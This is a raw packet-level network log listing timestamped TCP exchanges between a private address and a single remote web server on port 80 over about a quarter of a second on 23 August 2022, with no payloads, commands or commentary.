Aug 23, 2022 13:42:52.524808884 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.524818897 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.524848938 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.524924040 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.524944067 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.524962902 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.524987936 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.524998903 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.525031090 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.525079966 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.525115967 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.525154114 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.584449053 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.584497929 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.584527969 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.584549904 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.584558964 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.584590912 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.584608078 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.584619999 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.584649086 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.584656000 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.584676027 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.584703922 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.584717035 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.584732056 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.584763050 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.584769964 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.584790945 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.584822893 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.584827900 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.584852934 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.584882021 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.584891081 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.584909916 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.584939003 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.584954023 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.584968090 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.584995031 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.585005999 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.585024118 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.585052967 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.585069895 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.585082054 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.585110903 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.585122108 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.585139036 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.585169077 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.585180044 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.585196972 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.585226059 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.585232973 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.585253954 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.585282087 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.585292101 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.585310936 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.585338116 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.585345030 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.585366011 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.585395098 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.585401058 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.585424900 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.585453987 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.585460901 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.585483074 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.585521936 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.585552931 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.585582972 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.585612059 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.585618973 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.585640907 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.585675001 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.645287991 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.645335913 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.645375013 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.645405054 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.645430088 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.645459890 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.645458937 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.645482063 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.645488977 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.645498991 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.645517111 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.645545006 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.645550966 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.645571947 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.645598888 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.645606041 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.645626068 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.645652056 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.645657063 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.645679951 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.645709038 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.645714045 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.645735979 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.645762920 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.645766973 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.645791054 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.645819902 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.645819902 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.645848989 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.645876884 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.645917892 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.645946026 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.645972967 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.645977974 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.646001101 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.646032095 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.646116018 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.646147013 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.646173954 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.646189928 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.646203041 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.646236897 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.646313906 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.646342993 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.646372080 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.646375895 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.646400928 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.646434069 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.646444082 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.646471977 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.646498919 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.646507025 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.646527052 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.646557093 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.646668911 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.646698952 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.646725893 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.646730900 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.646752119 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.646786928 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.646795034 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.646825075 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.646852016 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.646856070 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.646879911 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.646909952 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.646996021 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.647027016 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.647054911 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.647059917 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.647083998 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.647114992 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.652537107 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.705671072 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.705714941 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.705754995 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.705782890 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.705806017 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.705813885 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.705830097 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.705842972 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.705868959 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.705884933 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.705899000 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.705925941 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.705935001 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.705955982 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.705985069 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.705993891 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.706012964 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.706041098 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.706048965 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.706069946 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.706098080 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.706104994 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.706125021 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.706152916 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.706161976 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.706182003 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.706209898 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.706234932 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.706238031 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.706267118 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.706278086 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.706293106 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.706321001 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.706334114 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.706347942 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.706377029 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.706388950 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.706403971 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.706432104 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.706443071 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.706460953 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.706486940 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.706499100 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.706513882 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.706542015 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.706552982 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.706569910 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.706607103 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.712522030 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.712568998 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.712606907 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.712635040 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.712663889 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.712692022 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.712707996 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.712721109 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.712730885 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.712749958 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.712759018 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.712779045 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.712805986 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.712820053 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.712836027 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.712863922 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.712876081 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.712891102 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.712918997 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.712929964 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.712944984 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.712982893 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.766309977 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.766360044 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.766387939 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.766416073 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.766442060 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.766443968 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.766469955 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.766473055 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.766500950 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.766522884 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.766527891 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.766556025 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.766577959 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.766585112 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.766613007 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.766638041 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.766640902 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.766668081 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.766690969 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.766695023 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.766721964 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.766746998 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.766750097 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.766777992 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.766798019 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.766803980 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.766834021 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.766858101 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.766860962 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.766890049 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.766911030 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.766917944 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.766947031 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.766971111 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.766974926 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.767003059 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.767020941 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.767030954 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.767079115 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.767102957 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.767133951 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.767162085 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.767184973 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.767189980 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.767218113 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.767236948 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.767246008 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.767272949 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.767293930 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.767301083 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.767328978 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.767359018 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.767370939 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.767396927 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.767422915 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.767424107 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.767452002 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.767469883 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.767478943 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.767504930 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.767530918 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.767532110 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.767560959 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.767585993 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.767586946 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.767612934 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.767636061 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.767637968 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.767663956 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.767679930 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.767690897 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.767716885 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.767735004 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.767743111 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.767767906 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.767786980 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.767797947 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.767824888 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.767851114 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.767851114 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.767883062 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.767899990 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.767909050 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.767935991 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.767957926 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.767963886 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.767992020 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.768008947 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.768018007 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.768043995 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.768064022 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.768071890 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.768099070 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.768115044 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.768126011 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.768151045 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.768167019 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.768176079 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.768218040 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.768321991 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.768348932 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.768374920 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.768393040 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.768429041 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.768455029 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.768472910 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.768496037 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.768548965 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.768568993 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.768624067 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.768654108 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.768676043 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.768682003 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.768709898 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.768731117 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.768737078 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.768764019 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.768781900 CEST	49172	80	192.168.2.22	141.8.192.151
